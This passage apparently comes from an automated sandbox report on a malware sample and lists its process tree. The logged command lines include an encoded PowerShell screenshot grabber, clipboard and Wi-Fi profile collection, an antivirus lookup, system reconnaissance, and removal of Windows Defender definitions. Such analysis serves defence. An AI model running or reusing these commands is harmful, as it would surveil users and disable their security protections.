AEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                                                                                                                                                    Imagebase:0x7ff784dd0000
                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:46
                                                                                                                                                                    Start time:09:24:11
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:47
                                                                                                                                                                    Start time:09:24:11
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:48
                                                                                                                                                                    Start time:09:24:11
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:49
                                                                                                                                                                    Start time:09:24:11
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:50
                                                                                                                                                                    Start time:09:24:11
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:tasklist /FO LIST
                                                                                                                                                                    Imagebase:0x7ff6bfe40000
                                                                                                                                                                    File size:106'496 bytes
                                                                                                                                                                    MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:51
                                                                                                                                                                    Start time:09:24:12
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\tree.com
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:tree /A /F
                                                                                                                                                                    Imagebase:0x7ff66f690000
                                                                                                                                                                    File size:20'992 bytes
                                                                                                                                                                    MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:52
                                                                                                                                                                    Start time:09:24:12
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\systeminfo.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:systeminfo
                                                                                                                                                                    Imagebase:0x7ff77bac0000
                                                                                                                                                                    File size:110'080 bytes
                                                                                                                                                                    MD5 hash:EE309A9C61511E907D87B10EF226FDCD
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:53
                                                                                                                                                                    Start time:09:24:12
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:powershell Get-Clipboard
                                                                                                                                                                    Imagebase:0x7ff788560000
                                                                                                                                                                    File size:452'608 bytes
                                                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:54
                                                                                                                                                                    Start time:09:24:12
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                                                                                                                                                    Imagebase:0x7ff7cbec0000
                                                                                                                                                                    File size:576'000 bytes
                                                                                                                                                                    MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:55
                                                                                                                                                                    Start time:09:24:12
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\netsh.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:netsh wlan show profile
                                                                                                                                                                    Imagebase:0x7ff68b0c0000
                                                                                                                                                                    File size:96'768 bytes
                                                                                                                                                                    MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:56
                                                                                                                                                                    Start time:09:24:12
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                                                                                                                                    Imagebase:0x7ff788560000
                                                                                                                                                                    File size:452'608 bytes
                                                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:57
                                                                                                                                                                    Start time:09:24:14
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wgovk1sp\wgovk1sp.cmdline
                                                                                                                                                                    Imagebase:0x7ff7486c0000
                                                                                                                                                                    File size:2'759'232 bytes
                                                                                                                                                                    MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:58
                                                                                                                                                                    Start time:09:24:14
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "getmac"
                                                                                                                                                                    Imagebase:0x7ff784dd0000
                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:59
                                                                                                                                                                    Start time:09:24:14
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                    Imagebase:0x7ff784dd0000
                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:60
                                                                                                                                                                    Start time:09:24:15
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                                                                                                                                                                    Imagebase:0x7ff65eca0000
                                                                                                                                                                    File size:468'120 bytes
                                                                                                                                                                    MD5 hash:B3676839B2EE96983F9ED735CD044159
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:61
                                                                                                                                                                    Start time:09:24:15
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6964.tmp" "c:\Users\user\AppData\Local\Temp\wgovk1sp\CSC886C9BC3BEB4426790141765FCC41D4.TMP"
                                                                                                                                                                    Imagebase:0x7ff7baf90000
                                                                                                                                                                    File size:52'744 bytes
                                                                                                                                                                    MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:62
                                                                                                                                                                    Start time:09:24:16
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:63
                                                                                                                                                                    Start time:09:24:17
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:64
                                                                                                                                                                    Start time:09:24:17
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\getmac.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:getmac
                                                                                                                                                                    Imagebase:0x7ff60d3f0000
                                                                                                                                                                    File size:90'112 bytes
                                                                                                                                                                    MD5 hash:7D4B72DFF5B8E98DD1351A401E402C33
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:65
                                                                                                                                                                    Start time:09:24:17
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\tree.com
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:tree /A /F
                                                                                                                                                                    Imagebase:0x7ff66f690000
                                                                                                                                                                    File size:20'992 bytes
                                                                                                                                                                    MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:67
                                                                                                                                                                    Start time:09:24:18
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                    Imagebase:0x7ff784dd0000
                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:68
                                                                                                                                                                    Start time:09:24:18
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:69
                                                                                                                                                                    Start time:09:24:18
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\tree.com
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:tree /A /F
                                                                                                                                                                    Imagebase:0x7ff66f690000
                                                                                                                                                                    File size:20'992 bytes
                                                                                                                                                                    MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:70
                                                                                                                                                                    Start time:09:24:18
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                    Imagebase:0x7ff784dd0000
                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:71
                                                                                                                                                                    Start time:09:24:18
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:72
                                                                                                                                                                    Start time:09:24:18
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\tree.com
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:tree /A /F
                                                                                                                                                                    Imagebase:0x7ff66f690000
                                                                                                                                                                    File size:20'992 bytes
                                                                                                                                                                    MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:73
                                                                                                                                                                    Start time:09:24:19
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                    Imagebase:0x7ff784dd0000
                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:74
                                                                                                                                                                    Start time:09:24:19
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:75
                                                                                                                                                                    Start time:09:24:19
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\tree.com
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:tree /A /F
                                                                                                                                                                    Imagebase:0x7ff66f690000
                                                                                                                                                                    File size:20'992 bytes
                                                                                                                                                                    MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:76
                                                                                                                                                                    Start time:09:24:19
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                    Imagebase:0x7ff784dd0000
                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:77
                                                                                                                                                                    Start time:09:24:19
                                                                                                                                                                    Start date:06/12/2023
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
